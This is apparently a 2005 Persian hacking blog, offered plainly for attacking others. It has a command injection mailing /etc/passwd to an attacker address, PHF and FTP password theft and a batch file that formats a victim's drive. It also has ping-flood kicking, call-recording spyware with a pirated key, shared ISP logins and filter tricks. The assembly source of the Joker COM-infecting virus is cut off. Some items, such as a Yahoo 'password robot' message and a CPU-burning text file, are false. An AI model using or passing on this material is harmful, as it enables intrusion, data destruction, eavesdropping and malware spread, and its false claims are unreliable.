... چون دسترسی به تمامی فایل های سیستم محیا می شود ...خودتون الان می فهمید که دسترسی به تمام فایل ها یعنی چی .. یعنی دسترسی به : Inetpub و دسترسی به این فولدر هم یعنی هک ! زیاد حرف زدم قابل توجه اون کسانی که می خواهند تلنت روی سیستم خود را آزمایش کنند : در ویندوز های NT ( یعنی ویندوز هایی با هسته NT مانند 2000٬XP٬NT و ...) در منوی Start در قسمت RUN بنویسید : Net Start Telnet و بعد از چند لحظه درگاه ۲۳ که همون درگاه تلنت است باز شده و با دستور Telnet localhost 23 وارد تلنت شده و از شما نام کاربری و کلمه عبور می خواهد ... با همون یوزر و پسورد که به سیستم عامل خود وارد شده اید در همینجا وارد کنید... در طی نوشتن نام کاربری و کلمه عبور شما هیچ نمی بینید ولی دستورات وارد میشود ؛ یادتون باشه اشتباه تایپ نکنین چون در تلنت نمی شه از Backspace استفاده کرد /// حالا وارد سیستم خود شده اید و هرچی فایل داشتین در اینجا در محیطی شبیه داس میبینید... خب وقتی حسابی با این سرویس تلنت آشنا شدین وقتشه که درگاه تلنت رو در سیستم خود ببندید تا امنیت سیستم به خطر نیوفته //////////////// برای این کار از دستور Net Stop Telnet در منوی StartRun استفاده کنین... یه خرده با سیستم خود ور برین (!) تا مطلب بعدی آماده بشه...

با تشکر.مدیزیت سایت هکران نهاوند

چهارشنبه 2 آذر ماه سال 1384

آموزش هک سرور ۲

یکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد . root:2fkbNba29uWys:0:1:Operator:/:/bin/csh admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:3A62i9qr:1012:10:Mashhad در اینجا مثلا Tahaنام IDو 3a62...کلمه عبور اما به صورت رمز در آمده می باشد . شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود . root:*:0:1:Operator:/:/bin/csh admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید FTP http://www.domain.com/ که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید FTP ftp://ftp.domain.com/ اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید . http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید . www.domain.com/cgi-bin/finger اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید . ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است . bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd با وارد کردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود ! خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید . حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی ..... و روش بعد : +در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم

با تشکر.مدیزیت سایت هکران نهاوند

چهارشنبه 2 آذر ماه سال 1384

آموزش هک سرور

با تشکر.مدیزیت سایت هکران نهاوند

چهارشنبه 2 آذر ماه سال 1384

آموزش هک کردن سایت با استفاده از دستور telnet

با سلام این یه روش برای هک کردن سایت است که به مناسبت سال تحصیلی جدید برای شما می گذارم.امیدوارم استفاده کافی راببرید.یه نظر هم بذارین ما دلگرم شویم.البته این روش در بعضی سایتها قابل اجرا است.برای هک کردن یه سایت به ترتیب از راه داس به شرحه زیر است:
۱.بعد از انصال به شبکه٬میری تو داس و به شکل زیر عمل میکنی:
C:>telnet http://www.domail-name.com/ 79
بجای domain-name اسم سایتی که می خوای هکش کنی مینویسی.اگه پورت ۷۹ که در آخر آدرس مورد نظر نوشتی در سرور باز باشه شما وارد میشوید و گرنه نمیشه
۲.اگر پورت باز بود و شما وارد شدید مشغول خراب کاریتون بشین اونش دیگه به من ربطی نداره می خوای چه بلایی سر سایت بیاری.
نکته
1.اگر در هنگام خراب کاری متوجه شدین سرعت سیستمتون خیلی کم شد سری خارج شو.
2.اگه از ترس اینکه پیدات کنن٬بعد از خراب کاریت فورا ریست نکن.اول دیسکانکت بعد ریست.
3.همون طور که اول گفتم اگه چیزی از هک سایت و فرمانهای داس نمیدونی اصلا بهت توصیه نمیکنم این کارو بکنی.
4.اینکه من هیچ مسئولیتی ندارم.

با تشکر.مدیریت سایت هکران نهاوند

چهارشنبه 2 آذر ماه سال 1384

بدست آوردن پسورد ایمیل طرف

۲-فکر میکنم همه شما ویروس Blaster را بشناسید(ویروسی که باعث Shutdown شدن کامپیوتر در 60 ثانیه میشد...) و حتی عده کثیری از شما روش ساخت آن را بدانید ولی در پایان این سری مقالات و جهت تکمیل این سری از مقالات لازم میدانم نگاهی سریع به آن بیندازیم و سپس به نکات تکمیلی این سری مقالات میپردازیم.

این ویروس را به طرق مختلفی و با دستورات گوناگونی میتوان نوشت که در اینجا دو روش را مورد بررسی قرار میدهیم در ضمن لطفا اگر با...

این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده کنید .
با استفاده از Shortcut:در جایی از دسکتاپ خود Right Click کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از دستورات زیر را وارد کنید:

1)shutdown -s -t xx
2)%windir%system32shutdown.exe -s -t xx

توضیح: بعد از اینکه Paste کردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا کامپیوتر پس از آن زمان خاموش شود.
سپس Next را بزنید و برای فایل خود یک نام برگزینید و کار تمام است!!.

۳-این پیغام را واسه روبات یاهو بفرستید تا پسوردی رو که میخواهید واستون بفرسته

اول این مطالب را به ترتیب بنویسید و بعد واسه یاهو بفرستید تا پسورد را بهتون بعد از ۱ روز بدهد

خط اول (ایمیل خودتون*پسوردتون)به همین شکل داخل پرانتز بنوسید
خط دوم(ایمیل کسی که میخواهید هکش کنید)به همین شکل داخل پرانتز بنوسید
خط سوم این نوشته را همین جوری کپی میکنید
*****___Hotmailpswd_rtrvl_Xtra-----fast-----server(victimpswd)----Snd---bk---anypswd(crack---rtrvl%^&%^&%^&"£""!_______SND_____Free----4635---Yahoo--Aol---Hotmail____(robat_sender@yahoo.com)
Email----Cracker%^&&^&^*((

تمام همین حالا اینو واسه این ایمیل که ایمیل پسورد یاب یاهوست بفرستید این فرمان باعث میشه روبات هنگ کرده و هر چه را که شما میخواهید واستون بفرسته

چهارشنبه 2 آذر ماه سال 1384

روش بدست اوردن ای پی دیگران و خارج کردنشون رو از یاهو

سلام
امروز می خوامچند تا مطلب براتون بنویسم که بدردتون می خوره:

۱-روش بدست اوردن ای پی دیگران و خارج کردنشون رو از یاهو بهتون یاد بدم.
برای این کار شما باید استارت رو باز کنین بد روی ران بزنین و کلمه ی cmd رو تایپ کنین و اینتر رو بزنین.
بد یه صفحه باز میشه که شما باید کلمه ی netstat -n رو بنویسین و دوباره اینتر رو بزنین.با این کار نوشته هایی ظاهر میشه که ای پی هم هستند.
پشته سر ای پی ها شماره هایی هم هست که مثلا نوشته 5050 یا 5051 که اگر اون عددها 5050 باشن ماله همون شخصه.
توجه:قبل از این کار باید اون شخص باید به شما پیغامی بده .
خوب حالا برای اینکه شما بتونین اون شخص از یاهو خارج کنین باید همون ای پی دوستتون رو کپی کنین و دوباره ران رو باز کنین و این رو بنویسین:
t- ای پی ping
بد باز یه سمد باز می شه که پشته سر هم مینویسه بد از چند دقیقه اون ای دی از یاهو خارج میشه.
توجه:این کار بعضی اوقات رویه بعضی کامپیوتر ها انجام نمیشه.

چهارشنبه 2 آذر ماه سال 1384

کش رفتن تلفن طرف

قبل از هر چیز اینو بگم که مودمتون باید (CallerID)داشته باشه

برنامه Modem spy چندین کار مهم را انجام می دهد که بنده

آنها را به صورت فهرست وار در زیر آورده ام.

1- پیدا کردن شماره تلفن کسی که با وی چت می کنیم

2- ظبط مکالماتی که از تلفن صورت می گیرد

3- نمایش دادن شماره تلفن شخصی که به شما تماس می گیرد(Caller ID)

هر کس این برنامه را می خواهد اینجا را کلیک کند.
DOWNLOAD
اینم رجیستر نامبرش :

Name: modemspy
SN: 14458

خوب حالا روش کا با نرم افزار:

بعد از دریافت و اجرای نرم افزار یک شمایل کوچک در نوار وظیفه ویندوز

مشاهده می نمایید. که برای دسترسی به ترم افزار می توانید روی آن کلیک

کنید.

ابتدا تنظیمات مربوط به نرم افزار:

روی منوی فایل کلیک کرده و گزینه Preferences را انتخاب نمایید. سپس

زبانه Harware را انتخاب نمایید و در آنجا مودم خود را برای نرم افزار مشخص

نمایید. همچنین تیک هر دو گزینه را بزنید و در پایین این دو گزینه کارت صوتی

خود را برای نرم افزار مشخص نمایید.حال به سراغ تب Recording بروید اگر

بخواهید تمامی مکالماتی که با شما تماس گرفته می شود را ظبط کنید باید

تیک مربوط به گزینه Record all incoming calls را بزنید در قسمت Answer

a call in seconds نیز در جای خالی باید مدت زمانی را که برای فعال شدن

برنامه وقتی که کسی با شما تماس می گیرد برای ظبط مکالمات می باشد

را وارد نمایید که بهتر است زمان 10 ثانیه باشد. اگر بخواهید که شما

مکالماتی که با دیگران تماس می گیرید را ظبط کنید باید تیک مربوط به گزینه

Record all outcalling … را علامت بزنید.البته اگر این تیک فعال باشد برنامه

هر 30ثانیه خط تلفن را برای شناسای اینکه کسی صحبت می کند یا نه چک

می نماید. برای تغییر این زمان می توانید در قسمت Check for dial tone

زمان مربوطه را وارد نمایید.

حال تب Save as را انتخاب نمایید.در قسمت Change format می توانید

فرمت مناسب برای ظبط مکالمات را انتخاب نمایید

در قسمت Advanced نیز هیچ گونه تغییری ندهید در انتها گزینه Apply را

کلیک کنید

حال دوباره به صفحه اصلی برنامه بر می گردیم.در قسمت Input device

گزینه Modem و در قسمت Outpout device نیز Sound carad را انتخاب

نمایید و هر دو تیک کنار آنها را علامت بزنید در پایین نرم افزار نیز تیک Record

all incoming calls را نیز علامت بزنید. خوب تمام شد. این نرم افزار به

شرطی کا می کند که مودم شما از قابلیتهایی که این نرم افزار دارد و در بالا

معرفی شد پشتیبانی کند اگر بعد از نصب نرم افزر با پیغام خطایی مواجه

شدید یعنی مودم شما از این قابلیتها پشتیبانی نمی کند

حالا فقط کافیه برنامه باز باشه .

اما چگونه هنگام چت شماره تلفن طرف رو پیدا کنیم:

برای اینکار شما باید اول این فایل پلاگین رو از اینجا دانلود کنید.

DOWNLOAD

در مرحله بعد این فایل رو در پوشه plugin در مکانی که نرم افزار نصب شده

کپی کنید.

حالا ازمنو plugin در بالای نرم افزار گزینه networking را فعال کنید ( معمولا

خودش فعاله اما کار از محکم کاری عیب نمیکنی) توجه کنید هیچکدام از

تنضیمات آن را تغییر ندهید . حالا کافیست نرم افزار باز باشد خود نرم افزار به

صورت خودکار شماره طرف رو بهتون نشون میده .

حالا فقط کافیه برنامه باز باشه .

حالا اگه کار نکرد دیگه تقصیر مودمتونه

مودمتون باید (CallerID)داشته باشه

چهارشنبه 2 آذر ماه سال 1384

ساخت یک ویروس جدید(فرمت هارد)

دوستان سلام :

برای امروز هم آموزش یک ویروس رو انتخاب کردم امیدوارم از اون هم لذت ببرید.

با این ویروسی که امروز به شما آموزش می دم می تونید درایو سی قر با نی رو فرمت کنید

این ویروس فوق العاده استثناییه !!! ولی در اینجا من نحوه ی ساختن این ویروس رو قرار میدم تا شما بتونید به راحتی نون بازوی خود رو خورده و از اون لذت ببرید!!!

شما جوری درایو سی قر بانی فرمت می کنید که به هیچ عنوان اطلاعات آن باز یابی نشود در اصل شما درایو قربانی فرمت uکردین

فرمت کردن درایو C سیستم قربانی به وسیله ی یک فایل BAT :

برای این کار ابتدا notepad رو باز کنید بعد کد زیر رو کپی کرده و در اونجا paste کنید :

@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format /autotest c:/u>nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
exit

در این مرحله شما فقط کافیه که این فایل رو با پسوند BAT ذخیره کنید.

سخت بود ؟؟؟؟ قطعا" نه !!!

به همین راحتی شما یکی از قدرتمند ترین ویروس ها ی بی خطر ( البته در حالت غیر اکتیو !!!) رو ساختید ............... با ذکر این نکته که به هیچ وجه روی اون دابل کلیک نکنید باید بگم که من اصلا" دوست ندارم که این ویروس رو روی کسی امتحان کنید و در واقع من هیچ تعهدی در قبال اون نخواهم داد

و اما این ویروس چه کار میکنه :

این کد ابتدا اطلاعات موجود در autoexe.bat رو پاک میکنه و در مرحله ی بعد کد 'format /autotest c:/u' رو جای اون قرار میده ............... حال فقط کافیه که قربانی سیستمش رو ریست کنه بعد این کد اجرا شده و به راحتی هرچه تمام تر درایو سی فرمت خواهد شد .

راستی ویروس های دیگر هستند که مثل این ویروس بعد از اجرا شدن آن دریو سی قربانی فرمت کن اما این ویروس جوری دستگاه قربانی فرمت می کنه که به هیچ عنوان اطلاعات آن بازیابی نشود

چهارشنبه 2 آذر ماه سال 1384

یک روش ساده واسه اد کردن افراد بدونه اجازه

سلام:

خوب این روش خیلی راحته

کافه ی یک پروفایل بسازید بد طرف روو با پروفایل اد کنید بد هم سریع پروفیل روو پاک کنیدحالا برید صفا ...

سه شنبه 1 آذر ماه سال 1384

یک ترفند برا عبور از 50% فیلترهای اینترنت

سلام دوستان یک ترفند توپ دارم که با اجرای اون میتونید از 50 % (پنجاه در صد) فیلتر های اینترنت عبور کنید برای اینکار باید هنگامی که به اینترنت وصل هستید به مسیر Start / Runرفته و تایپ کنید cmdبعد وارد صفحه داس که شدید مینویسید ping www.xxxxxxx توجه کنید که بعد از ping یک فاصله هست که باید رعایت کنید و بعد به جای xxxxxxx اسم سایت فیلتر شده رو مینویسید مانند مثال زیر ping www.taranehha.com بعد از زدن دکمه اینتر یک عدد در اول صفحه مانند زیر به شما میدهد [217.219.54.8] و یک سری نوشته ها و اعداد دیگر که ما به آنها کاری نداریم فقط این عدد رو که در کادر نوشته شما در مرورگر تایپ کنید که من خودم برای سایتهای ترانه ها و آبادان و تک تاز امتحان کردم که از فیلترش عبور کرد موفق باشید. بی زحمت نظر بده

سه شنبه 1 آذر ماه سال 1384

اینترنت رایگان

مشخصات لازم برای دسترسی به اینترانت تهران :
شماره شبکه (اتصال): 9718733
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 8502818
مشخصات لازم برای دسترسی به اینترانت مشهد :
شماره شبکه (اتصال): 9712010
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 2238202
مشخصات لازم برای دسترسی به اینترانت قم :
شماره شبکه (اتصال): 2909505
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 2909510
مشخصات لازم برای دسترسی به اینترانت اراک :
شماره شبکه (اتصال): 9713001
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 3667206
مشخصات لازم برای دسترسی به اینترانت اصفهان :
شماره شبکه (اتصال): 9718227
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 2344612
مشخصات لازم برای دسترسی به اینترانت یزد :
شماره شبکه (اتصال): 9717414
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 7252684
مشخصات لازم برای دسترسی به اینترانت کرمان :
شماره شبکه (اتصال): 9712200
Tebyanntشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 2221191
مشخصات لازم برای دسترسی به اینترانت بندرعباس :
شماره شبکه (اتصال): 9713000
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 3330407
مشخصات لازم برای دسترسی به اینترانت قزوین :
شماره شبکه (اتصال): 9713312
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 3321051
مشخصات لازم برای دسترسی به اینترانت زاهدان :
شماره شبکه (اتصال): 9713002
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 3219017
مشخصات لازم برای دسترسی به اینترانت همدان :
شماره شبکه (اتصال): 9714256
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 4227903
مشخصات لازم برای دسترسی به اینترانت اهواز :
شماره شبکه (اتصال): 3303901
Tebyannetشناسه کاربری:
Tebyannetرمرز عبور:
پشتیبانی: 3366636

سه شنبه 1 آذر ماه سال 1384

سوزوندن CPU طرف

سلام ۱-تا الآن بدترین و آزار دهنده ترین ویروسی که در دنیا معرفی شده ویروس BLASTER_&_SASSAR است. این ویروس سی پی یو فرد قربانی رو میسوزونه.من آموزش ساختن این ویروس رو به شما یاد میدهیم. 1.روی دسکتاپ راست کلیک کنید. 2.گزینه new رو انتخاب کنید. 3.text doceument رو انتخاب کنید 4.حالا وارد تکست داکیومنت خود شوید و در آن تایپ کنید 5.cpu_567hjkblaster 6.حالا از آن خارج شوید و روش راست کلیک کنید 7.گزینه rename رو انتخاب کنید و یک اسم دلخواه برای آن فایل بگذارید. 8.بعد این فایل رو برای یکی بفرستید. خطر: اگر سی پی یو تون رو دوست دارین به هیچ وجه این فایل را در سیستم خود اجرای نکنید و گرنه.... ۲-ویروس بلستر ویروسی است که باعث Shutdown شدن ویندوز در زمان تعیین شده میشود... ساخت این دو روش دارد روش اول :::: در جائی از دسکتاپ خود راست کلیک Right Click کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از این دو دستور را بنویسید . Shutdown -s -t xx یا %windir%System32Shutdown.exe -s -t xx نکته:::: بعد از این که این دستورات را نوشتید به جای xx مدت زمانی را که میخواهید بر حسب ثانیه پس از اجرای آن سیستم خاموش شود را تعیین کنید . مثال ::: Shutdown -s -t 30 یا %windir%System32Shutdown.exe -s -t 30 میبینید که من 30 ثانیه را انتخاب کردم .بهد از این کار Next را بزنید و یه اسم برای فایلتون انتخاب کنید. روش دوم :::: یکی از برنامه های Notepad . Wordpad را باز کنید و یکی از دستورات بالا را در آن بنویسید و با پسوند BAT. سیو کنید مثل Shutdown.bat و تمام .... Anti Blaster و اما برای خنثی کردن این ویروس یکی از دو مراحل بالا را انجام میدهیم و به جای متنهای بالا دستور زیر را مینویسیم . Shutdown -a و Next را میزنیم ....

سه شنبه 1 آذر ماه سال 1384

ساختن ویروسی که مانع بالا آمدن ویندوز میشه(با نت پد) ۲

این اسکریپت روی هرکامپیوتری اجرا بشه نمی ذاره کامپیوترش بالا بیاد. حتی فرصت کلیک کردن روی ایکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونید روی کامپیوتر خودتون هم اجراش کنید . برای خلاصی ازش باید فایل C: estart.vbs رو از کامپیوترتون از طریق Dos حذف کنید بعد ویندوزتون بالا می آد
کد پایین را روی notepad کپی کنید و فایل را با پسوند vbs ذخیره کنید. می تونید برای هر کسی بفرستید ...

اینم کدش :

09:23 AM | مهدی | هک بوت کرک ویروس | نظرات [1]

سه شنبه 1 آذر ماه سال 1384

آموزش ایجا ویروسهای خفن ۱

با یک کلیک هارد را فرمت کنید!!! سلامی از روی ارادت و نه از روی عادت به تمامی دوستان عزیز که به من لطف دارید دوستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد : یک ویروس خطرناک با نام Joker : برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه:

title " Joker! virus.  Written by The BOOT SECTOR Infector ... "
;
; Joker - This is a remake of the deceased "Joker/Jocker" virus.  The original
;   had multiple programming errors in it that kept it from replicating.
;   My version is much more successful.
;

page 255,80
code segment      word public 'code'
       assume cs:code,ds:code
       org 100h
main proc;edure

;EQUates...
 idc  equ 69h  ;ID character - (note: 69)
 cr  equ 13  ;ASCII for carriage return
 lf  equ 10  ;ASCII for line feed
;End codes.  These determine what happens after the string is displayed.
 terminate equ 0 ;Terminate program after display
 halt  equ 1 ;Cause the system to hang after display
 SimulateCritErr equ 2 ;Simulate the critical error handler
 return2host equ 3 ;Resume program immediately
 FlashFloppy equ 4 ;Wait for a key, then reset Drive A:
 WaitKey  equ 5 ;Wait for a key, then resume program
 PauseKey equ 6 ;Same thing, but uses a pause message
 StackError equ 7 ;Cause a stack overflow (halts system)
 
tof:       ;Top-Of-File
  jmp begin    ;Skip over program
idchar:  db idc    ;ID character
HostProgram: nop     ;First run copy only!
  nop     ;First run copy only!
first_four: nop     ;First run copy only!
address: int 20h    ;First run copy only!
check:  nop     ;First run copy only!
begin:  call nextline   ;Push IP+3 onto stack
nextline: pop bp    ;mov bp,ip
  sub bp,offset nextline  ;bp=disp. for mem locs
  push ax    ;Save AX
  call cryptor    ;Decrypt
  jmp short retloc   ;Continue program
cryptor: mov al,[bp+offset encrypt_val] ;encrypt val
  lea si,[bp+offset toec]  ;Top Of Encrypted Code
  mov cx,offset eoec-offset toec ;Length of  "      "
cryptorloop: xor [si],al    ;en/de crypt
  rol al,cl    ;change code #
  inc si    ;Next char please!
  loop cryptorloop   ;loop if necessary
  ret     ;Return to caller
  
infect:  call cryptor    ;Encrypt code
  pop cx    ;Restore CX for INT 21
  int 21h    ;Call DOS
  call cryptor    ;Decrypt code
  ret     ;Go back
toec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤTop Of Encrypted Code
InfectIt: push cx    ;Save CX for sub
  jmp infect
retloc:  pop ax    ;Restore AX
  xor di,di    ;DI = 0
  cli     ;Disable interrupts
  mov ss,di    ;Set up stack at:
  mov sp,2F0h    ;   0000:02F0
  sti     ;Enable interrupts
  mov si,96h    ;Vector for INT 24h
  mov bx,ss:[si]   ;BX = offset in segment
  mov cx,ss:[si+2]   ;CX = segment
  lea dx,[bp+offset int24handler] ;CS:DX -} local handler
  mov ss:[si],DX   ;Save offset
  mov ss:[si+2],cs   ;Save segment
  mov si,es:[di+2F8h]   ;Check operation mode
  cmp si,4643h   ;'CF' if already TSRed
  jne GoOn    ;Nope, jmp
  jmp return    ;Yes, don't do anything
GoOn:  mov cs:[di+4Ch],bx   ;use unused part of PSP
  mov cs:[di+4Eh],cx   ; to save BX and CX
  push cs    ;Copy CS ...
  pop es    ; ... to DS
  mov byte ptr [bp+offset infected],0 ;Reset infection count
  mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less
GoOn2:  lea si,[bp+offset first_four] ;Original first 4 bytes
  mov di,offset tof   ;TOF never changes
  cld     ;Read left-to-right
  movsw     ;Copy the 4 bytes
  movsw     ;Copy the 4 bytes
  mov ah,1Ah    ;Set DTA address ...
  lea dx,[bp+offset DTA]  ; ... to *our* DTA
  int 21h    ;Call DOS to set DTA
  mov ah,4Eh    ;Find First ASCIIZ
  lea dx,[bp+offset filespec]  ;DS:DX -} '*.COM',0
  lea si,[bp+offset filename]  ;Point to file
  push dx    ;Save DX
  jmp short continue   ;Continue...
return:  mov ah,1ah    ;Set DTA address ...
  mov dx,80h    ; ... to default DTA
  int 21h    ;Call DOS to set DTA
  xor di,di    ;DI= 0
  mov es,di    ;ES= 0
  mov si,96h    ;Vector for INT 24h
  mov bx, cs:[di+4Ch]   ;Restore from saved BX
  mov word ptr es:[si+0], bx  ;Place back into vector
  mov cx, cs:[di+4Eh]   ;Restore from saved CX
  mov word ptr es:[si+2], cx  ;Place back into vector
  push cs    ;Move CS ...
  pop es    ; ... to ES
  mov ax,[bp+offset SavedAX]  ;Restore AX
  xor bx,bx    ;BX= 0
  mov cx,bx    ;CX= 0
  mov dx,cx    ;DX= 0
  mov si,dx    ;SI= 0
  mov di,si    ;DI= 0
  mov sp,0FFFEh   ;SP= FFFEh (normal)
  mov bp,100h    ;BP= 100h (RETurn addr)
  push bp    ; Put on stack
  mov bp,ax    ;BP= 0
  ret     ;JMP to 100h
nextfile: or bx,bx    ;Did we open the file?
  jz skipclose   ;No, so don't close it
  mov ah,3Eh    ;Close file
  int 21h    ;Call DOS to close it
  xor bx,bx    ;Set BX back to 0
skipclose: mov ah,4Fh    ;Find Next ASCIIZ
continue: pop dx    ;Restore DX
  push dx    ;Re-save DX
  xor cx,cx    ;CX= 0
  xor bx,bx
  int 21h    ;Find First/Next
  jnc skipjmp
  jmp NoneLeft   ;Out of files
skipjmp: mov ax,3D02h   ;open file
  mov dx,si    ;point to filespec
  int 21h    ;Call DOS to open file
  jc nextfile   ;Next file if error
  mov bx,ax    ;get the handle
  mov ah,3Fh    ;Read from file
  mov cx,4    ;Read 4 bytes
  lea dx,[bp+offset first_four] ;Read in the first 4
  int 21h    ;Call DOS to read
  cmp byte ptr [bp+offset check],idc ;Already infected?
  je nextfile   ;Yep, try again ...
;NOTE: Delete the two lines above if you want it to re-infected programs.
  cmp byte ptr [bp+offset first_four],77  ;Mis-named .EXE?
  je nextfile   ;Yep, maybe next time!
  mov ax,4202h   ;LSeek to EOF
  xor cx,cx    ;CX= 0
  xor dx,dx    ;DX= 0
  int 21h    ;Call DOS to LSeek
  cmp ah,0F8h    ;Longer than 62K?
  ja nextfile   ;Yep, try again...
  mov [bp+offset addr],ax  ;Save call location
  mov ah,40h    ;Write to file
  mov cx,4    ;Write 4 bytes
  lea dx,[bp+offset first_four] ;Point to buffer
  int 21h    ;Save the first 4 bytes
  mov ah,[bp+offset encrypt_val] ;Get code number
  inc ah    ;add 1
  adc ah,0    ;increment if it's zero
  mov [bp+offset encrypt_val],ah ;Save new code number
